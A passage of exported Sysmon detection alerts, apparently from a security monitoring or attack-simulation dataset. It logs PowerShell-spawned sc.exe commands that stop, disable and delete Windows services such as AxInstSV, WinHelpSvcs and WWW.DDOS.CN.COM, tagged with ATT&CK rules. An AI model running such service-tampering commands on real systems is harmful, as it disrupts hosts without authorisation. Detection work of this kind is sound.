\""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.963"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00100f672100}"",""processId"":""7288"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.357",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.951 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00102b662100} +ProcessId: 4884 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config AxInstSV Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config AxInstSV Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.953136800Z"",""eventRecordID"":""2754"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.951\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00102b662100}\r\nProcessId: 4884\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config AxInstSV Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.951"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00102b662100}"",""processId"":""4884"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config AxInstSV Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.292",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.924 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00106d642100} +ProcessId: 7352 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.926812600Z"",""eventRecordID"":""2752"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.924\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00106d642100}\r\nProcessId: 7352\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.924"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00106d642100}"",""processId"":""7352"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.231",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.885 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010c6612100} +ProcessId: 5780 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.887527900Z"",""eventRecordID"":""2749"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.885\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010c6612100}\r\nProcessId: 5780\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.885"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010c6612100}"",""processId"":""5780"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.197",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.860 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-001000602100} +ProcessId: 2652 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.862919000Z"",""eventRecordID"":""2747"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.860\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-001000602100}\r\nProcessId: 2652\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.860"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-001000602100}"",""processId"":""2652"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.191",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.847 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010135f2100} +ProcessId: 7344 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.850748200Z"",""eventRecordID"":""2746"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.847\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010135f2100}\r\nProcessId: 7344\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.847"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010135f2100}"",""processId"":""7344"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.125",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.803 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010515c2100} +ProcessId: 1480 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.805655200Z"",""eventRecordID"":""2743"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.803\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010515c2100}\r\nProcessId: 1480\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.803"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010515c2100}"",""processId"":""1480"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 